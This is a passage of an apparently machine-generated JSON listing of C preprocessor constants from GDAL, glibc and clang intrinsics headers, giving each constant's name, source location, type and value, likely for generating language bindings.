"tag": "const", "name": "_m_empty", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1499:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "ENFILE", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:27:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 23 }, { "tag": "const", "name": "EISDIR", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:25:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 21 }, { "tag": "const", "name": "_m_from_int", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1500:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EINVAL", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:26:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 22 }, { "tag": "const", "name": "ENOTDIR", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 20 }, { "tag": "const", "name": "_m_from_int64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1501:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_GBOOL_DEFINED", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:220:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "ENODEV", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 19 }, { "tag": "const", "name": "EEXIST", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:21:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 17 }, { "tag": "const", "name": "EXDEV", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:22:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 18 }, { "tag": "const", "name": "EBUSY", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:20:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "ENOTBLK", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 15 }, { "tag": "const", "name": "GINTBIG_MAX", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:256:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9223372036854775807 }, { "tag": "const", "name": "GINTBIG_MIN", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:254:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -9223372036854775808 }, { "tag": "const", "name": "GDALMD_AOP_AREA", "ns": 0, "location": "/usr/include/gdal/gdal.h:233:11", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "Area" }, { "tag": "const", "name": "CPL_HAS_GINT64", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:261:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "GDALMD_AREA_OR_POINT", "ns": 0, "location": "/usr/include/gdal/gdal.h:230:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "AREA_OR_POINT" }, { "tag": "const", "name": "RASTERIO_EXTRA_ARG_CURRENT_VERSION", "ns": 0, "location": "/usr/include/gdal/gdal.h:176:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "GUINTBIG_MAX", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:258:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "GINT64_MIN", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:272:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -9223372036854775808 }, { "tag": "const", "name": "GDALMD_AOP_POINT", "ns": 0, "location": "/usr/include/gdal/gdal.h:236:11", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "Point" }, { "tag": "const", "name": "CPLE_WrongFormat", "ns": 0, "location": "/usr/include/gdal/gdal.h:244:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200 }, { "tag": "const", "name": "GUINT64_MAX", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:276:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "GINT64_MAX", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:274:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9223372036854775807 }, { "tag": "const", "name": "CPL_FRMT_GUIB", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:318:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "%llu" }, { "tag": "const", "name": "CPL_FRMT_GIB", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:316:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "%lld" }, { "tag": "const", "name": "CPL_FRMT_GB_WITHOUT_PREFIX", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:310:11", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "ll" }, { "tag": "const", "name": "GDAL_DMD_CREATIONOPTIONLIST", "ns": 0, "location": "/usr/include/gdal/gdal.h:303:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_CREATIONOPTIONLIST" }, { "tag": "const", "name": "GDAL_DMD_OPENOPTIONLIST", "ns": 0, "location": "/usr/include/gdal/gdal.h:308:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_OPENOPTIONLIST" }, { "tag": "const", "name": "CPL_C_START", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:341:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "GDAL_DMD_CONNECTION_PREFIX", "ns": 0, "location": "/usr/include/gdal/gdal.h:295:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_CONNECTION_PREFIX" }, { "tag": "const", "name": "CPL_C_END", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:342:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "GDAL_DMD_EXTENSIONS", "ns": 0, "location": "/usr/include/gdal/gdal.h:300:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_EXTENSIONS" }, { "tag": "const", "name": "CPL_DLL", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:350:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "GDAL_DMD_CREATIONFIELDDATASUBTYPES", "ns": 0, "location": "/usr/include/gdal/gdal.h:321:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_CREATIONFIELDDATASUBTYPES" }, { "tag": "const", "name": "GDAL_DMD_SUBDATASETS", "ns": 0, "location": "/usr/include/gdal/gdal.h:324:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_SUBDATASETS" }, { "tag": "const", "name": "GDAL_DMD_CREATIONDATATYPES", "ns": 0, "location": "/usr/include/gdal/gdal.h:311:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_CREATIONDATATYPES" }, { "tag": "const", "name": "GDAL_DMD_CREATIONFIELDDATATYPES", "ns": 0, "location": "/usr/include/gdal/gdal.h:316:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_CREATIONFIELDDATATYPES" }, { "tag": "const", "name": "GDAL_DMD_MIMETYPE", "ns": 0, "location": "/usr/include/gdal/gdal.h:286:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_MIMETYPE" }, { "tag": "const", "name": "__AVX512FINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "GDAL_DMD_EXTENSION", "ns": 0, "location": "/usr/include/gdal/gdal.h:289:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_EXTENSION" }, { "tag": "const", "name": "GDAL_DMD_LONGNAME", "ns": 0, "location": "/usr/include/gdal/gdal.h:280:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_LONGNAME" }, { "tag": "const", "name": "GDAL_DMD_HELPTOPIC", "ns": 0, "location": "/usr/include/gdal/gdal.h:283:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DMD_HELPTOPIC" }, { "tag": "const", "name": "GDAL_DCAP_NONSPATIAL", "ns": 0, "location": "/usr/include/gdal/gdal.h:387:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_NONSPATIAL" }, { "tag": "const", "name": "GDAL_DCAP_DEFAULT_FIELDS", "ns": 0, "location": "/usr/include/gdal/gdal.h:375:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_DEFAULT_FIELDS" }, { "tag": "const", "name": "GDAL_DCAP_NOTNULL_GEOMFIELDS", "ns": 0, "location": "/usr/include/gdal/gdal.h:380:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_NOTNULL_GEOMFIELDS" }, { "tag": "const", "name": "__AVX512VLCDINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "GDAL_DCAP_FEATURE_STYLES", "ns": 0, "location": "/usr/include/gdal/gdal.h:392:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_FEATURE_STYLES" }, { "tag": "const", "name": "GDAL_DCAP_CREATECOPY", "ns": 0, "location": "/usr/include/gdal/gdal.h:347:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_CREATECOPY" }, { "tag": "const", "name": "GDAL_DCAP_VIRTUALIO", "ns": 0, "location": "/usr/include/gdal/gdal.h:350:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_VIRTUALIO" }, { "tag": "const", "name": "GDAL_DCAP_OPEN", "ns": 0, "location": "/usr/include/gdal/gdal.h:327:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_OPEN" }, { "tag": "const", "name": "GDAL_DCAP_CREATE", "ns": 0, "location": "/usr/include/gdal/gdal.h:337:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_CREATE" }, { "tag": "const", "name": "GDAL_DCAP_GNM", "ns": 0, "location": "/usr/include/gdal/gdal.h:365:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_GNM" }, { "tag": "const", "name": "GDAL_DCAP_NOTNULL_FIELDS", "ns": 0, "location": "/usr/include/gdal/gdal.h:370:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_NOTNULL_FIELDS" }, { "tag": "const", "name": "GDAL_DCAP_RASTER", "ns": 0, "location": "/usr/include/gdal/gdal.h:355:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_RASTER" }, { "tag": "const", "name": "GDAL_DCAP_VECTOR", "ns": 0, "location": "/usr/include/gdal/gdal.h:360:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DCAP_VECTOR" }, { "tag": "const", "name": "GDAL_OF_VECTOR", "ns": 0, "location": "/usr/include/gdal/gdal.h:445:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "GDAL_OF_RASTER", "ns": 0, "location": "/usr/include/gdal/gdal.h:439:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "GDAL_OF_ALL", "ns": 0, "location": "/usr/include/gdal/gdal.h:433:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "GDAL_OF_UPDATE", "ns": 0, "location": "/usr/include/gdal/gdal.h:427:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "GDAL_OF_INTERNAL", "ns": 0, "location": "/usr/include/gdal/gdal.h:478:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 128 }, { "tag": "const", "name": "GDAL_OF_VERBOSE_ERROR", "ns": 0, "location": "/usr/include/gdal/gdal.h:470:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "GDAL_OF_KIND_MASK", "ns": 0, "location": "/usr/include/gdal/gdal.h:457:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 30 }, { "tag": "const", "name": "GDAL_OF_SHARED", "ns": 0, "location": "/usr/include/gdal/gdal.h:464:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "GDAL_OF_GNM", "ns": 0, "location": "/usr/include/gdal/gdal.h:451:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "GDAL_OF_READONLY", "ns": 0, "location": "/usr/include/gdal/gdal.h:421:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__AVX512VLDQINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "GDAL_OF_HASHSET_BLOCK_ACCESS", "ns": 0, "location": "/usr/include/gdal/gdal.h:509:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 512 }, { "tag": "const", "name": "GDAL_OF_ARRAY_BLOCK_ACCESS", "ns": 0, "location": "/usr/include/gdal/gdal.h:499:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 256 }, { "tag": "const", "name": "GDAL_OF_DEFAULT_BLOCK_ACCESS", "ns": 0, "location": "/usr/include/gdal/gdal.h:489:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "GDAL_OF_BLOCK_ACCESS_MASK", "ns": 0, "location": "/usr/include/gdal/gdal.h:517:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 768 }, { "tag": "const", "name": "GDAL_OF_RESERVED_1", "ns": 0, "location": "/usr/include/gdal/gdal.h:514:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 768 }, { "tag": "const", "name": "_THREAD_SHARED_TYPES_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:20:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "S_IRGRP", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:180:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "_BITS_PTHREADTYPES_COMMON_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:20:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__ptr_t", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:109:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "S_IREAD", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:175:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 256 }, { "tag": "const", "name": "__fsfilcnt_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:201:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__END_DECLS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:118:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_ALLOCA_H", "ns": 0, "location": "/usr/include/alloca.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__BEGIN_DECLS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:117:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__fsblkcnt_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:197:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "S_IEXEC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:177:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "__AVX512BWINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__blkcnt_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:193:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "S_ISGID", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:161:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1024 }, { "tag": "const", "name": "S_ISUID", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:160:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2048 }, { "tag": "const", "name": "__blksize_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:186:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "S_IWRITE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:176:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 128 }, { "tag": "const", "name": "S_IXUSR", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:170:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "__flexarr", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:143:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__glibc_c99_flexarr_available", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:144:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__IFMAVLINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "NFDBITS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/select.h:80:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "S_IFBLK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:107:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 24576 }, { "tag": "const", "name": "__attribute_malloc__", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:208:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "S_IFCHR", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:106:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8192 }, { "tag": "const", "name": "S_IFLNK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:113:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 40960 }, { "tag": "const", "name": "S_IFREG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:108:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32768 }, { "tag": "const", "name": "__VBMIINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmiintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "FD_SETSIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/select.h:73:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1024 }, { "tag": "const", "name": "S_IFDIR", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:105:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16384 }, { "tag": "const", "name": "__NFDBITS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/select.h:54:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "S_IFIFO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:110:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4096 }, { "tag": "const", "name": "S_IFMT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:104:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 61440 }, { "tag": "const", "name": "__IFMAINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmaintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "UTIME_OMIT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:207:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1073741822 }, { "tag": "const", "name": "__suseconds_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/select.h:44:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__attribute_pure__", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:226:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "S_IFSOCK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:117:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 49152 }, { "tag": "const", "name": "__attribute_const__", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:233:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "S_ISVTX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:165:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 512 }, { "tag": "const", "name": "_STRUCT_TIMESPEC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h:3:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__FMAINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__attribute_used__", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:242:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_mm_cvtss_i32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9042:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "S_IRUSR", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:168:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 256 }, { "tag": "const", "name": "_mm_cvtsd_i32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9043:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__timeval_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_timeval.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "S_IRWXU", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:172:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 448 }, { "tag": "const", "name": "_SIGSET_NWORDS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__sigset_t.h:4:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "S_IWUSR", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:169:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 128 }, { "tag": "const", "name": "__sigset_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_mm_cvtsd_i64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9048:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "____sigset_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__sigset_t.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_mm_cvtss_i64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9047:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_mm_cvti32_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9045:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_mm_cvti32_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9044:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPLReadDir", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:303:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_mm_cvti64_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9050:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_mm_cvti64_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9049:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__STDC_ISO_10646__", "ns": 0, "location": "/usr/include/stdc-predef.h:58:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 201706 }, { "tag": "const", "name": "__GNU_LIBRARY__", "ns": 0, "location": "/usr/include/features.h:433:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "__GLIBC__", "ns": 0, "location": "/usr/include/features.h:437:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_SYS_SELECT_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/select.h:22:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__FD_ZERO_STOS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/select.h:28:11", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "stosq" }, { "tag": "const", "name": "__GLIBC_MINOR__", "ns": 0, "location": "/usr/include/features.h:438:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 29 }, { "tag": "const", "name": "_SYS_CDEFS_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__LEAF_ATTR", 